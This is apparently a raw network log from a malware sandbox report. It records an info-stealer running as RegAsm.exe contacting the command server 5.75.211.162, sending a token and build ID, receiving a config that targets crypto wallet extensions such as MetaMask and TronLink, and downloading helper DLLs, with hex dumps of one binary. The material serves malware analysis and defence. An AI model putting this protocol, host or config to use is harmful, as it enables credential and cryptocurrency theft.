                                                                                                      Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.5497205.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:34 UTC277OUTPOST / HTTP/1.1
                                                                                                      Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBG
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Content-Length: 332
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:34 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 30 31 66 35 64 35 36 31 36 64 31 63 66 65 32 37 37 38 33 39 36 36 66 37 65 35 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74
                                                                                                      Data Ascii: ------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GIDBKKKKKFBGDGDHIDBGCont
                                                                                                      2024-09-26 17:05:35 UTC158INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:35 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2024-09-26 17:05:35 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.5497215.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:36 UTC278OUTPOST / HTTP/1.1
                                                                                                      Content-Type: multipart/form-data; boundary=----IJDBGDGCGDAKFIDGIDBF
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Content-Length: 5765
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:36 UTC5765OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 30 31 66 35 64 35 36 31 36 64 31 63 66 65 32 37 37 38 33 39 36 36 66 37 65 35 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74
                                                                                                      Data Ascii: ------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------IJDBGDGCGDAKFIDGIDBFCont
                                                                                                      2024-09-26 17:05:37 UTC158INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:37 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2024-09-26 17:05:37 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 2ok0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.5497225.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:37 UTC193OUTGET /sqlp.dll HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:37 UTC263INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:37 GMT
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Length: 2459136
                                                                                                      Connection: close
                                                                                                      Last-Modified: Thursday, 26-Sep-2024 17:05:37 GMT
                                                                                                      Cache-Control: no-store, no-cache
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-09-26 17:05:37 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                      2024-09-26 17:05:37 UTC16384INData Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                      Data Ascii: %:X~e!*FW|>|L1146
                                                                                                      2024-09-26 17:05:37 UTC16384INData Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56
                                                                                                      Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                                      2024-09-26 17:05:38 UTC16384INData Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89
                                                                                                      Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                      2024-09-26 17:05:38 UTC16384INData Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f
                                                                                                      Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                      2024-09-26 17:05:38 UTC16384INData Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                      Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                      2024-09-26 17:05:38 UTC16384INData Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                      Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                      2024-09-26 17:05:38 UTC16384INData Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3
                                                                                                      Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                      2024-09-26 17:05:38 UTC16384INData Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3
                                                                                                      Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                      2024-09-26 17:05:38 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81
                                                                                                      Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.5497235.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:40 UTC277OUTPOST / HTTP/1.1
                                                                                                      Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Content-Length: 829
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:40 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 30 31 66 35 64 35 36 31 36 64 31 63 66 65 32 37 37 38 33 39 36 36 66 37 65 35 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74
                                                                                                      Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GCBGIIECGHCAKECAFBFHCont
                                                                                                      2024-09-26 17:05:41 UTC158INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:41 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2024-09-26 17:05:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 2ok0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.5497245.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:41 UTC277OUTPOST / HTTP/1.1
                                                                                                      Content-Type: multipart/form-data; boundary=----EHDGIJJDGCBKFIDHIEBK
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Content-Length: 437
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:41 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 30 31 66 35 64 35 36 31 36 64 31 63 66 65 32 37 37 38 33 39 36 36 66 37 65 35 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 0d 0a 43 6f 6e 74
                                                                                                      Data Ascii: ------EHDGIJJDGCBKFIDHIEBKContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------EHDGIJJDGCBKFIDHIEBKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------EHDGIJJDGCBKFIDHIEBKCont
                                                                                                      2024-09-26 17:05:42 UTC158INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:42 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2024-09-26 17:05:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 2ok0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.5497255.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:42 UTC277OUTPOST / HTTP/1.1
                                                                                                      Content-Type: multipart/form-data; boundary=----DAEBKKKEHDHDGDGCFBKJ
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Content-Length: 437
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:42 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 30 31 66 35 64 35 36 31 36 64 31 63 66 65 32 37 37 38 33 39 36 36 66 37 65 35 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74
                                                                                                      Data Ascii: ------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------DAEBKKKEHDHDGDGCFBKJCont
                                                                                                      2024-09-26 17:05:43 UTC158INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:43 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2024-09-26 17:05:43 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 2ok0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      11192.168.2.5497265.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:43 UTC196OUTGET /freebl3.dll HTTP/1.1
